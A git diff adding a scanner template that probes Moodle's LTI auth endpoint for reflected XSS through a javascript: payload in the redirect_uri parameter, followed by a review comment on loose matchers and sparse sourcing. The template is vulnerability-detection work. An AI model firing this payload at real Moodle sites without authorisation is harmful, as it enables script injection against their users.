diff --git a/vulnerabilities/moodle/moodle-xss.yaml b/vulnerabilities/moodle/moodle-xss.yaml
new file mode 100644
index 0000000000..3ec9f75720
--- /dev/null
+++ b/vulnerabilities/moodle/moodle-xss.yaml
@@ -0,0 +1,30 @@
+id: moodle-xss
+
+info:
+ name: Moodle redirect_uri Reflected XSS
+ author: hackergautam
+ description: XSS in moodle via redirect_uri parameter
+ severity: medium
+ tags: moodle,xss
+ reference: https://twitter.com/kx1z0/status/1381588818256617479
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/mod/lti/auth.php?redirect_uri=javascript:alert('{{randstr}}')"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "{{randstr}}"
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
\ No newline at end of file
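Review bot: The body matcher in the first `matchers` entry fires on any reflection of `{{randstr}}`, including one where the server has HTML-encoded or otherwise neutralised the rest of the value, so a patched or hardened Moodle instance can still be reported as vulnerable. Matching the whole value as it must appear unencoded, `- "javascript:alert('{{randstr}}')"` under `words:`, ties the finding to the scheme and quotes surviving intact. Even then the template does not show where in the page the value lands, so the `description` should say that a hit needs manual confirmation and, if known, which Moodle versions are affected; the only reference given is a tweet. The file also ends without a trailing newline.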